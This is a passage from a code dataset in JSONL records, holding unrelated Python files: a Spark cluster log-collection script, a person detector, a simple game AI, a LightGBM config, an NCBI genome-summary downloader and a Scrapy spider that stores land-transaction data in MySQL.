subprocess.check_call(cmd, shell=True)\n break\n except subprocess.CalledProcessError:\n logging.info(\"命令执行失败,请重新输入\")\n cmd = input()\n continue\n\n\n# os.system('ssh slave5 \\'' + workload_path + '/hadoop/run.sh\\'')\n\ndef start(res):\n print('请输入执行任务的命令')\n cmd = input()\n while True:\n # benchmark=res.name\n pin_ano_start_time=time.time()\n ### luice comment\n\n 
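        # Launch one sampler per slave: each thread SSHes into the host and starts lib/samp_run.py there.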
for slave in slaves_name:\n t = threading.Thread(target = start_samp_slave,args=(slave,))\n t.start()\n\n slaves=res.slaves\n ano_slaves=[]\n if slaves=='all':\n ano_slaves=slaves_name\n elif slaves=='':\n pass\n else:\n ano_slaves.extend(slaves.split())\n # 去掉异常生成器的调用\n # for i in ano_slaves:\n # t = threading.Thread(target = start_anomaly_slave,args=(i,res.last,res.ano,res.ip))\n # t.start()\n logging.info('ready to start workload,timestamp=',time.time())\n pin_benchmark_start_time=time.time()\n try:\n subprocess.check_call(cmd, shell=True)\n break\n except subprocess.CalledProcessError:\n logging.info(\"命令执行失败,请重新输入\")\n cmd = input()\n continue\n # start_benchmark(cmd)\n logging.info('benchmark done! timestamp=',time.time())\n logging.info('ready to collect logs')\n pin_benmark_end_time=time.time()\n collect_logs()\n pin_collect_log_time=time.time()\n kill()\n decode()\n\n pin_end_time=time.time()\n with open('experiment/overhead','a') as d:\n d.write('%.3f %.3f %.3f %.3f %.3f %.3f'%(pin_global_init_time-pin_global_start_time,pin_ano_start_time-pin_global_init_time,\n pin_benchmark_start_time-pin_ano_start_time,pin_benmark_end_time-pin_benchmark_start_time,pin_collect_log_time-pin_benmark_end_time,\n pin_end_time-pin_collect_log_time)+'\\n')\n # get application duration\n for file in os.listdir('out'):\n if file.startswith('app'):\n app='out/'+file\n # luice comment\n '''\n import job_time\n print('spark log file:',app)\n start_time,end_time=job_time.job_time(app)\n print('\\n+---------------------------------------------------------------+')\n print('\\tjob time:',end_time-start_time,'delay:',start_time-pin_ano_start_time)\n print('+---------------------------------------------------------------+\\n')\n with open(res.job_time_file,'a') as f:\n f.write(str(end_time-start_time)+'\\n')\n with open('out/delay','w') as f:\n f.write(str(start_time-pin_ano_start_time))\n time.sleep(5)\n os.system(\"ps aux|grep \\\"anomaly_generator.py\\\"|awk \\'{print $2}\\'|xargs kill $1\")\n print('\\033[32m[INFO] Application analysis...\\033[0m')\n os.system('python3 root_cause.py')\n '''\n\ndef collect_logs():\n os.system(\"cp $SPARK_HOME/tsee_log/* ./logs\")\n os.system(\"cp ./logs/app* ./out\")\n for slave in slaves_name:\n os.system(\"scp \"+slave+\":\"+prefix+\"/logs/iostat_log_master ./logs/iostat_log_\"+slave)\n\n for slave in slaves_name:\n os.system(\"scp \"+slave+\":\"+prefix+\"/logs/vmstat_log_master ./logs/vmstat_log_\"+slave)\n\n for slave in slaves_name:\n os.system(\"scp \"+slave+\":\"+prefix+\"/logs/mpstat_log_master ./logs/mpstat_log_\"+slave)\n\n for slave in slaves_name:\n os.system(\"scp \"+slave+\":\"+prefix+\"/logs/sar_log_master ./logs/sar_log_\"+slave)\n\n for slave in slaves_name:\n os.system(\"scp \"+slave+\":\"+prefix+\"/logs/anomaly_log.txt ./logs/anomaly_\"+slave)\n# def collect_logs():\n# os.system(\"cp $SPARK_HOME/tsee_log/* temp/bigroot/logs\")\n# os.system(\"cp temp/bigroot/logs/app* temp/bigroot/out\")\n# for slave in slaves_name:\n# os.system(\"scp \"+slave+\":\"+prefix+\"/temp/bigroot/logs/iostat_log_master temp/bigroot/logs/iostat_log_\"+slave)\n#\n# for slave in slaves_name:\n# os.system(\"scp \"+slave+\":\"+prefix+\"/temp/bigroot/logs/vmstat_log_master temp/bigroot/logs/vmstat_log_\"+slave)\n#\n# for slave in slaves_name:\n# os.system(\"scp \"+slave+\":\"+prefix+\"/temp/bigroot/logs/mpstat_log_master temp/bigroot/logs/mpstat_log_\"+slave)\n#\n# for slave in slaves_name:\n# os.system(\"scp \"+slave+\":\"+prefix+\"/temp/bigroot/logs/sar_log_master 
temp/bigroot/logs/sar_log_\"+slave)\n#\n# for slave in slaves_name:\n# os.system(\"scp \"+slave+\":\"+prefix+\"/temp/bigroot/logs/anomaly_log.txt temp/bigroot/logs/anomaly_\"+slave)\n\ndef init():\n os.system(\"rm ./logs/* ./out/* experiment/*\")\n for slave in slaves_name:\n os.system(\"ssh \"+slave+\" python \"+prefix+\"lib/kill_samp.py\")\n\n os.system(\"rm /home/zhg/spark/tsee_log/*\")\n logging.info('clear old logs in salves')\n for slave in slaves_name:\n os.system('ssh '+slave+' \"rm %slogs/*\"'%(prefix))\n\ndef decode():\n os.system(\"cp logs/anomaly* out\")\n for slave in slaves_name:\n decode_sar(slave)\n for slave in slaves_name:\n decode_mpstat(slave)\n for slave in slaves_name:\n decode_iostat(slave)\n\ndef kill():\n for slave in slaves_name:\n os.system(\"ssh \"+slave+\" python \"+prefix+\"lib/kill_samp.py\")\n\n\nparser=argparse.ArgumentParser()\nparser.add_argument('-run',action='store_true',help='run the whole system')\n# parser.add_argument('-name',type=str,default='micro/wordcount',help='specify benchmark name')\nparser.add_argument('-collect',action='store_true',help='collect logs from slaves')\nparser.add_argument('-decode',action='store_true',help='decode logs')\nparser.add_argument('-last',type=int,default=30,help='specify anomaly last time')\nparser.add_argument('-ano',type=str,default='cpu',help='choices are cpu, io, net, all')\nparser.add_argument('-slaves',type=str,default='5',help='slaves to generate anomaly')\nparser.add_argument('-ip',type=str,default='10.254.13.16',help='connect particular ip address')\nparser.add_argument('-job_time_file',type=str,default='info',help='dump job duration info to this file')\nparser.add_argument('-tnum',type=int,default='32',help='thread num to start')\nres=parser.parse_args()\nif res.run:\n ### luice comment\n pin_global_start_time=time.time()\n logging.info('init system status')\n init()\n pin_global_init_time=time.time()\n start(res)\n\n# luice comment\n'''\nif res.collect:\n collect_logs()\n decode()\n kill()\nif res.decode:\n decode()\n'''\n","sub_path":"cmd/bigroot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"538052689","text":"from .yolo.yolo import YoloDetector\nfrom .nanodet.nanodet import NanoDetector\nfrom .nanodet.util import Logger, cfg, load_config\n\nimport torch\n\n\nclass PersonDetector:\n def __init__(self, cfg_file, weight):\n if cfg_file.endswith(\".yml\"):\n logger = Logger(0, use_tensorboard=False)\n self.algo = \"nanodet\"\n load_config(cfg, cfg_file)\n self.detector = NanoDetector(cfg, weight, logger)\n elif cfg_file.endswith(\".cfg\"):\n self.algo = \"yolov3\"\n self.detector = YoloDetector(cfg_file, weight)\n else:\n raise ValueError(\"{} is not a cfg file!\".format(cfg_file))\n\n def detect(self, frame):\n if self.algo == \"nanodet\":\n meta, res = self.detector.inference(frame)\n boxes = [box for box in res[0][0] if box[-1] > 0.35]\n return torch.tensor([box + [1, 0] for box in boxes])\n elif self.algo == \"yolov3\":\n boxes = self.detector.inference(frame)\n return boxes\n\n\nif __name__ == '__main__':\n import cv2\n cfg = \"/home/hkuit164/Downloads/yolo_selected/coco_basic/pytorch/yolov3-original-1cls-leaky.cfg\"\n weight = \"/home/hkuit164/Downloads/yolo_selected/coco_basic/pytorch/last.weights\"\n\n detector = PersonDetector(cfg, weight)\n\n img_path = \"/media/hkuit164/Elements/data/posetrack18/images/test/000693_mpii_test/000013.jpg\"\n img = cv2.imread(img_path)\n 
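    # Each row of dets begins with the [x1, y1, x2, y2] box corners, which the loop below slices and draws.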
dets = detector.detect(img)\n for bbox in dets:\n bbox = bbox[:4].tolist()\n img = cv2.rectangle(img, (int(bbox[0]), int(bbox[1])), (int(bbox[2]), int(bbox[3])), (255, 0, 0), 4)\n cv2.imshow(\"result\", img)\n cv2.waitKey(0)\n","sub_path":"src/detector/detector.py","file_name":"detector.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"554476972","text":"from mechanics.fractions import Fractions\nfrom mechanics.AI import RandomAI\n\nclass BruteAI:\n def __init__(self, battlefield, fractions):\n self.battlefield = battlefield\n self.fractions = fractions\n self.random_ai = RandomAI(battlefield)\n\n def decide_step(self, active_unit, target_fraction=Fractions.PLAYER):\n assert active_unit in self.battlefield.unit_locations\n\n start_location = self.battlefield.unit_locations[active_unit]\n\n target_units = [unit for unit, fraction in self.fractions.items() if fraction is target_fraction]\n\n if target_units:\n distances = self.battlefield.get_units_dists_to(start_location, units_subset=target_units)\n target, _ = distances[0]\n target_location = self.battlefield.unit_locations[target]\n possible_steps = self.battlefield.get_neighbouring_cells(start_location)\n cell, _ = self.battlefield.get_nearest_cell(candidates=possible_steps, target=target_location)\n return cell\n\n else:\n return self.random_ai.decide_step(active_unit)\n\n","sub_path":"mechanics/AI/BruteAI.py","file_name":"BruteAI.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"384930449","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 18-7-21\n\n@author: Suspext\n\"\"\"\nfrom hyperopt import hp\nimport warnings\n\nwarnings.filterwarnings('ignore')\n\n\nclass Config(object):\n path = '/home/suspext/Data/kaggle/Home Credit/'\n origin = path + 'origin/'\n feature = path + 'feature/'\n\n train_path = origin + 'application_train.csv'\n test_path = origin + 'application_test.csv'\n\n lgb_params = { # default\n 'application': 'binary', # regression\n 'boosting_type': 'gbdt', # gbdt\n 'n_estimators': 1000, # 100\n\n 'learning_rate': 0.05, # 0.1\n 'num_leaves': 32,\n 'colsample_bytree': 0.95,\n 'bagging_fraction': 0.87, # 1\n 'feature_fraction': 1, # 1\n 'max_depth': 8, # -1, < 0 意味着没有限制.\n 'reg_alpha': 0.04,\n 'reg_lambda': 0.073,\n\n 'is_unbalance': False, # False\n 'metric': 'auc', # l2\n # 工具箱的最大数特征值决定了容量 工具箱的最小数特征值可能会降低训练的准确性, 但是可能会增加一些一般的影响(处理过度学习)\n 'max_bin': 255, # 255\n 'n_jobs': -1,\n 'verbose': 200,\n 'min_split_gain': 0.022, # 0\n 'min_child_weight': 40,\n # 'early_stopping_round': 100, # 0\n }\n\n lgb_params_fune = {\n 'application': 'binary', # regression\n 'boosting_type': 'gbdt', # gbdt\n 'n_estimators': 1000, # 100\n\n 'learning_rate': hp.choice('learning_rate', range(2, 20)), # 0.1\n 'bagging_fraction': 1, # 1\n 'feature_fraction': 1, # 1\n 'max_depth': -1, # -1, < 0 意味着没有限制.\n 'reg_alpha': 0.1,\n 'reg_lambda': 0.1,\n\n 'is_unbalance': hp.choice('is_unbalance', [True, False]), # False\n 'metric': 'auc', # l2\n\n 'max_bin': 255, # 255\n 'n_jobs': -1,\n 'verbose': 200,\n 'min_split_gain': 0, # 0\n }\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"application/kaggle/Home_Credit/Home_Credit_Config.py","file_name":"Home_Credit_Config.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} 
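The PersonDetector record above picks a backend from the config file's extension with an if/elif chain. Below is a minimal, self-contained sketch of the same dispatch idea using a registry table instead; the register decorator, make_detector, and the two Stub* classes are hypothetical stand-ins for YoloDetector/NanoDetector (nothing here comes from the repo's yolo/nanodet packages), shown only to illustrate how a table keeps the constructor unchanged when new backends are added.

# Sketch: extension-keyed backend registry (stubs stand in for the real detectors).
import os

_BACKENDS = {}

def register(ext):
    # Map a config-file extension to the class that handles it.
    def deco(cls):
        _BACKENDS[ext] = cls
        return cls
    return deco

@register(".cfg")
class StubYolo:  # hypothetical stand-in for YoloDetector
    def __init__(self, cfg_file, weight):
        self.cfg_file, self.weight = cfg_file, weight

@register(".yml")
class StubNanoDet:  # hypothetical stand-in for NanoDetector
    def __init__(self, cfg_file, weight):
        self.cfg_file, self.weight = cfg_file, weight

def make_detector(cfg_file, weight):
    # Dispatch on extension; unknown extensions fail the same way the original does.
    ext = os.path.splitext(cfg_file)[1]
    if ext not in _BACKENDS:
        raise ValueError("{} is not a cfg file!".format(cfg_file))
    return _BACKENDS[ext](cfg_file, weight)

print(type(make_detector("model.cfg", "last.weights")).__name__)  # -> StubYolo (paths are illustrative)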
+{"seq_id":"467050610","text":"#_*_coding:UTF-8_*_\r\n\r\n\"\"\"\r\n包含assembly_summary.txt的url地址列表\r\n总的refseq信息,bacteria,archaea,fungi,viral,protozoa\r\n\"\"\"\r\n\r\nimport subprocess\r\nimport argparse\r\n\r\n\r\ndef taxonomy():\r\n taxonomy_url = [\"ftp://ftp.ncbi.nih.gov/pub/taxonomy/taxdump.tar.gz\"]\r\n taxonomy_urls = [\"ftp://ftp.ncbi.nih.gov/pub/taxonomy/accession2taxid/nucl_gb.accession2taxid.gz\",\r\n \"ftp://ftp.ncbi.nih.gov/pub/taxonomy/accession2taxid/nucl_wgs.accession2taxid.gz\"]\r\n cmd0 = \"mkdir taxonomy\"\r\n subprocess.check_output(cmd0, shell=True)\r\n cmd1 = \"cd taxonomy && wget %s\"%taxonomy_url[0]\r\n cmd2 = \"cd taxonomy && tar -zxvf %s\"%taxonomy_url[0].split(\"/\")[5]\r\n subprocess.check_output(cmd1, shell=True)\r\n subprocess.check_output(cmd2, shell=True)\r\n for url in taxonomy_urls:\r\n cmd3 = \"cd taxonomy && wget %s\"%url\r\n cmd4 = \"cd taxonomy && gunzip %s\"%url.split(\"/\")[6]\r\n subprocess.check_output(cmd3, shell=True)\r\n subprocess.check_output(cmd4, shell=True)\r\n\r\n\r\ndef download_assembly():\r\n\r\n #ref seq genomes info download\r\n refseq_url = [\"ftp://ftp.ncbi.nih.gov/genomes/refseq/assembly_summary_refseq.txt\"]\r\n refseq_url_list = [\"ftp://ftp.ncbi.nih.gov/genomes/refseq/bacteria/assembly_summary.txt\",\r\n \"ftp://ftp.ncbi.nih.gov/genomes/refseq/archaea/assembly_summary.txt\",\r\n \"ftp://ftp.ncbi.nih.gov/genomes/refseq/fungi/assembly_summary.txt\",\r\n \"ftp://ftp.ncbi.nih.gov/genomes/refseq/viral/assembly_summary.txt\",\r\n \"ftp://ftp.ncbi.nih.gov/genomes/refseq/protozoa/assembly_summary.txt\"]\r\n\r\n # genbank genomes info download\r\n genbank_url = [\"ftp://ftp.ncbi.nih.gov/genomes/genbank/assembly_summary_genbank.txt\"]\r\n genbank_url_list = [\"ftp://ftp.ncbi.nih.gov/genomes/genbank/bacteria/assembly_summary.txt\",\r\n \"ftp://ftp.ncbi.nih.gov/genomes/genbank/archaea/assembly_summary.txt\",\r\n \"ftp://ftp.ncbi.nih.gov/genomes/genbank/fungi/assembly_summary.txt\",\r\n \"ftp://ftp.ncbi.nih.gov/genomes/genbank/viral/assembly_summary.txt\",\r\n \"ftp://ftp.ncbi.nih.gov/genomes/genbank/protozoa/assembly_summary.txt\"]\r\n\r\n # options \"refseq\"\r\n if args.input_type == \"refseq\":\r\n cmd = \"wget -O %s_%s %s\"%(refseq_url[0].split(\"/\")[4],refseq_url[0].split(\"/\")[5],refseq_url[0])\r\n subprocess.check_output(cmd, shell=True)\r\n for ref_url in refseq_url_list:\r\n cmd1 = \"wget -O %s_%s_%s %s\"%(ref_url.split(\"/\")[4],ref_url.split(\"/\")[5],ref_url.split(\"/\")[6],ref_url)\r\n subprocess.check_output(cmd1, shell=True)\r\n\r\n # options \"genbank\"\r\n elif args.input_type == \"genbank\":\r\n cmd = \"wget -O %s_%s %s\"%(genbank_url[0].split(\"/\")[4],genbank_url[0].split(\"/\")[5],genbank_url[0])\r\n subprocess.check_output(cmd, shell=True)\r\n for genbank_url in genbank_url_list:\r\n cmd1 = \"wget -O %s_%s_%s %s\"%(genbank_url.split(\"/\")[4],genbank_url.split(\"/\")[5],genbank_url.split(\"/\")[6],genbank_url)\r\n subprocess.check_output(cmd1, shell=True)\r\n\r\n # options \"all\"\r\n elif args.input_type == \"all\":\r\n # total info\r\n merger_url = []\r\n merger_url.append(refseq_url[0])\r\n merger_url.append(genbank_url[0])\r\n\r\n # split info\r\n merger_url_list = []\r\n for i in refseq_url_list:\r\n merger_url_list.append(i)\r\n for j in genbank_url_list:\r\n merger_url_list.append(j)\r\n for url in merger_url:\r\n cmd = \"wget -O %s_%s %s\"%(url.split(\"/\")[4],url.split(\"/\")[5],url)\r\n subprocess.check_output(cmd, shell=True)\r\n for url1 in merger_url_list:\r\n cmd1 = \"wget -O %s_%s_%s 
%s\"%(url1.split(\"/\")[4],url1.split(\"/\")[5],url1.split(\"/\")[6],url1)\r\n subprocess.check_output(cmd1, shell=True)\r\n else:\r\n print(\"ERROR: CHECK THE TYPE\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser(description=\"Download assembly summary from genbank or refseq\")\r\n parser.add_argument('-tax', \"--taxonomy\", type=str, help= \"GenBank taxonomy files\")\r\n parser.add_argument('-type',\"--input_type\",type=str, help=\"input the download directory such as 'refseq', 'genbank' or 'all'\")\r\n args = parser.parse_args()\r\n if args.taxonomy == \"taxonomy\":\r\n taxonomy()\r\n elif args.input_type == \"refseq\" or args.input_type == \"genbank\" or args.input_type == \"all\":\r\n download_assembly()\r\n else:\r\n print(\"usage: download_assembly_summary_v1.py [-h] [-type INPUT_TYPE] [-tax TAXONOMY]\")\r\n","sub_path":"01_download_assembly_summary.py","file_name":"01_download_assembly_summary.py","file_ext":"py","file_size_in_byte":4633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"563681373","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom pymysql import *\n\n\nclass IptestSpider(scrapy.Spider):\n name = 'fail'\n allowed_domains = ['landchina.mnr.gov.cn']\n # start_urls = ['http://landchina.mnr.gov.cn/land/jggg/gpcr1/202006/t20200610_7476600.htm'] # 开始爬取的位置\n urls = [] # 开始爬取的位置\n index = 0\n file_name = None\n\n def __init__(self, f=None, *args, **kwargs):\n super(IptestSpider, self).__init__(*args, **kwargs)\n self.file_name = f\n\n def start_requests(self):\n\n # file = open(\"C:\\\\Users/仙/Desktop/links_pure.txt\")\n file = open(\"/Users/xxm/develop/py_workspace/scrapy_learn/scrapy_learn/spiders/files/\" + str(\n self.file_name) + \".txt\")\n\n while True:\n text = file.readline() # 只读取一行内容\n # 判断是否读取到内容\n if not text:\n break\n # self.start_urls.append(text)\n url = text.replace('\\n', '')\n # print(url)\n yield scrapy.Request(url=url, callback=self.parse, dont_filter=True)\n\n print('------->>>>> 结束 ', len(self.start_urls))\n\n # yield scrapy.Request(url=self.start_urls[self.index], callback=self.parse, dont_filter=True)\n\n # start_urls结果返回到parse\n def parse(self, response):\n url = response.request.url\n\n # if (len(self.urls) == 0):\n # file = open(\"C:\\\\Users/仙/Desktop/links_pure.txt\")\n # while True:\n # text = file.readline() # 只读取一行内容\n # # 判断是否读取到内容\n # if not text:\n # break\n # self.urls.append(text)\n #\n # print('-------------->>>>', len(self.urls))\n # 行政区\n obj = {\n 'xzq': '',\n 'xmmc': '',\n 'xmwz': '',\n 'gymj': '',\n 'clmj': '',\n 'gdfs': '',\n 'tdyt': '',\n 'synx': '',\n 'hyfl': '',\n 'tdjb': '',\n 'cjjg': '',\n 'zfqh': '',\n 'ydzfrq': '',\n 'ydzfje': '',\n 'tdsyqr': '',\n 'bz': '',\n 'ydrjlx': '',\n 'ydrjls': '',\n 'ydjdsj': '',\n 'ydkgsj': '',\n 'ydjgsj': '',\n 'sjkgsj': '',\n 'sjjgsj': '',\n 'pzdw': '',\n 'htqdrq': '',\n 'url': url\n\n }\n obj['url'] = url\n xpath_url = '//div[@class=\"gu-art-con\"]/table/tr[2]/td[2]/text()'\n if len(response.xpath(xpath_url).extract()):\n xzq = response.xpath(xpath_url).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['xzq'] = xzq\n\n xmmc_u = '//div[@class=\"gu-art-con\"]/table/tr[3]/td[2]/text()'\n if len(response.xpath(xmmc_u).extract()):\n xmmc = response.xpath(xmmc_u).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['xmmc'] = xmmc\n\n xmwz_u = '//div[@class=\"gu-art-con\"]/table/tr[4]/td[2]/text()'\n if len(response.xpath(xmwz_u).extract()):\n xmwz = 
response.xpath(xmwz_u).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['xmwz'] = xmwz\n\n gymj_u = '//div[@class=\"gu-art-con\"]/table/tr[5]/td[2]/text()'\n if len(response.xpath(gymj_u).extract()):\n gymj = response.xpath(gymj_u).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['gymj'] = gymj\n\n clmj_u = '//div[@class=\"gu-art-con\"]/table/tr[5]/td[4]/text()'\n if len(response.xpath(clmj_u).extract()):\n clmj = response.xpath(clmj_u).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['clmj'] = clmj\n\n tdyt_u = '//div[@class=\"gu-art-con\"]/table/tr[6]/td[2]/text()'\n if response.xpath(tdyt_u).extract():\n tdyt = response.xpath(tdyt_u).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['tdyt'] = tdyt\n\n gdfs_u = '//div[@class=\"gu-art-con\"]/table/tr[6]/td[4]/text()'\n if len(response.xpath(gdfs_u).extract()):\n gdfs = response.xpath(gdfs_u).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['gdfs'] = gdfs\n\n synx_u = '//div[@class=\"gu-art-con\"]/table/tr[7]/td[2]/text()'\n if len(response.xpath(synx_u).extract()):\n synx = response.xpath(synx_u).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['synx'] = synx\n\n hyfl_u = '//div[@class=\"gu-art-con\"]/table/tr[7]/td[4]/text()'\n if len(response.xpath(hyfl_u).extract()):\n hyfl = response.xpath(hyfl_u).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['hyfl'] = hyfl\n\n tdjb_u = '//div[@class=\"gu-art-con\"]/table/tr[8]/td[2]/text()'\n if len(response.xpath(tdjb_u).extract()):\n tdjb = response.xpath(tdjb_u).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['tdjb'] = tdjb\n\n cjjg_u = '//div[@class=\"gu-art-con\"]/table/tr[8]/td[4]/text()'\n if len(response.xpath(cjjg_u).extract()):\n cjjg = response.xpath(cjjg_u).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['cjjg'] = cjjg\n\n # /table/tbody/tr[2]/td[1]/text()\n\n zfqh_u = '//div[@class=\"gu-art-con\"]/table/tr[9]/td[2]/table/tr[2]/td[1]/text()'\n if len(response.xpath(zfqh_u).extract()):\n zfqh = response.xpath(zfqh_u).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['zfqh'] = zfqh\n\n ydzfrq_u = '//div[@class=\"gu-art-con\"]/table/tr[9]/td[2]/table/tr[2]/td[2]/script'\n if len(response.xpath(ydzfrq_u).extract()):\n ydzfrq = \\\n response.xpath(ydzfrq_u).extract()[0].replace('\\n', '').replace(' ', '').split('var a = \\'')[1].split(\n '\\';')[0]\n obj['ydzfrq'] = ydzfrq\n\n ydzfje_u = '//div[@class=\"gu-art-con\"]/table/tr[9]/td[2]/table/tr[2]/td[3]/text()'\n if len(response.xpath(ydzfje_u).extract()):\n ydzfje = response.xpath(ydzfje_u).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['ydzfje'] = ydzfje\n\n bz_u = '//div[@class=\"gu-art-con\"]/table/tr[9]/td[2]/table/tr[2]/td[4]/text()'\n if (len(response.xpath(bz_u).extract())):\n bz = response.xpath(bz_u).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['bz'] = bz\n\n tdsyqr_u = '//div[@class=\"gu-art-con\"]/table/tr[10]/td[2]/text()'\n if len(response.xpath(tdsyqr_u).extract()):\n tdsyqr = response.xpath(tdsyqr_u).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['tdsyqr'] = tdsyqr\n\n ydrjlx_u = '//div[@class=\"gu-art-con\"]/table/tr[11]/td[2]/table/tr[1]/td[2]/text()'\n if len(response.xpath(ydrjlx_u).extract()):\n ydrjlx = response.xpath(ydrjlx_u).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['ydrjlx'] = ydrjlx\n\n ydrjls_u = '//div[@class=\"gu-art-con\"]/table/tr[11]/td[2]/table/tr[1]/td[4]/text()'\n if 
len(response.xpath(ydrjls_u).extract()):\n ydrjls = response.xpath(ydrjls_u).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['ydrjls'] = ydrjls\n\n ydjdsj_u = '//div[@class=\"gu-art-con\"]/table/tr[11]/td[4]/text()'\n if (len(response.xpath(ydjdsj_u).extract())):\n ydjdsj = response.xpath(ydjdsj_u).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['ydjdsj'] = ydjdsj\n\n ydkgsj_u = '//div[@class=\"gu-art-con\"]/table/tr[12]/td[2]/text()'\n if (len(response.xpath(ydkgsj_u).extract())):\n ydkgsj = response.xpath(ydkgsj_u).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['ydkgsj'] = ydkgsj\n\n ydjgsj_u = '//div[@class=\"gu-art-con\"]/table/tr[12]/td[4]/text()'\n if (len(response.xpath(ydjgsj_u).extract())):\n ydjgsj = response.xpath(ydjgsj_u).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['ydjgsj'] = ydjgsj\n\n sjkgsj_u = '//div[@class=\"gu-art-con\"]/table/tr[13]/td[2]/text()'\n if (len(response.xpath(sjkgsj_u).extract())):\n sjkgsj = response.xpath(sjkgsj_u).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['sjkgsj'] = sjkgsj\n\n sjjgsj_u = '//div[@class=\"gu-art-con\"]/table/tr[13]/td[4]/text()'\n if (len(response.xpath(sjjgsj_u).extract())):\n sjjgsj = response.xpath(sjjgsj_u).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['sjjgsj'] = sjjgsj\n\n pzdw_u = '//div[@class=\"gu-art-con\"]/table/tr[14]/td[2]/text()'\n if (len(response.xpath(pzdw_u).extract())):\n pzdw = response.xpath(pzdw_u).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['pzdw'] = pzdw\n\n htqdrq_u = '//div[@class=\"gu-art-con\"]/table/tr[14]/td[4]/text()'\n if (len(response.xpath(htqdrq_u).extract())):\n htqdrq = response.xpath(htqdrq_u).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['htqdrq'] = htqdrq\n\n # print('-------------------')\n # print(response.xpath(ydrjl_u).extract())\n\n # 写mysql\n # sql = 'INSERT INTO fail0_copy' + str(self.file_name) \\\n sql = 'INSERT INTO fail0' \\\n + ' (xzq,xmmc,xmwz,gymj,clmj,gdfs,synx,hyfl,tdjb,cjjg,zfqh,ydzfrq,ydzfje,tdsyqr,bz,ydrjlx,' \\\n 'ydrjls,ydjdsj,ydkgsj,ydjgsj,sjkgsj,sjjgsj,pzdw,htqdrq,tdyt,url,create_date)' \\\n ' VALUES' \\\n ' ( ' \\\n \" %s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,\" \\\n \"%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,\" \\\n \" %s,now())\"\n\n args = (str(obj['xzq']),\n str(obj['xmmc']),\n str(obj['xmwz']),\n str(obj['gymj']),\n str(obj['clmj']),\n str(obj['gdfs']),\n str(obj['synx']),\n str(obj['hyfl']),\n str(obj['tdjb']),\n str(obj['cjjg']),\n str(obj['zfqh']),\n str(obj['ydzfrq']),\n str(obj['ydzfje']),\n str(obj['tdsyqr']),\n str(obj['bz']),\n str(obj['ydrjlx']),\n str(obj['ydrjls']),\n str(obj['ydjdsj']),\n str(obj['ydkgsj']),\n str(obj['ydjgsj']),\n str(obj['sjkgsj']),\n str(obj['sjjgsj']),\n str(obj['pzdw']),\n str(obj['htqdrq']),\n str(obj['tdyt']),\n url\n )\n # f_res = open(\n # \"/Users/xxm/develop/py_workspace/scrapy_learn/scrapy_learn/spiders/files/res/\" + str(self.file_name), 'a')\n # f_res.write(str(obj)+\"\\n\")\n # f_res.close()\n print(sql)\n sql = sql.replace('\\\\', '')\n try:\n cur.execute(sql, args)\n con.commit()\n print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')\n except Exception as e:\n print(e)\n print('==========@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@=========', url)\n f = open(\"/Users/xxm/develop/py_workspace/scrapy_learn/scrapy_learn/spiders/files/fail_url\", 'a')\n f.write(url + '\\n')\n f.close()\n # print('=======>>对象:', obj)\n 
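# Reviewer sketch (assumption, not shown in this file): 'cur' and 'con' are taken to be\n        # module-level pymysql handles created elsewhere in the project, e.g.\n        #   con = connect(host='localhost', user='...', password='...', database='...', charset='utf8')\n        #   cur = con.cursor()\n        # so that cursor.execute(sql, args) above runs the INSERT as a parameterized query.\n        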
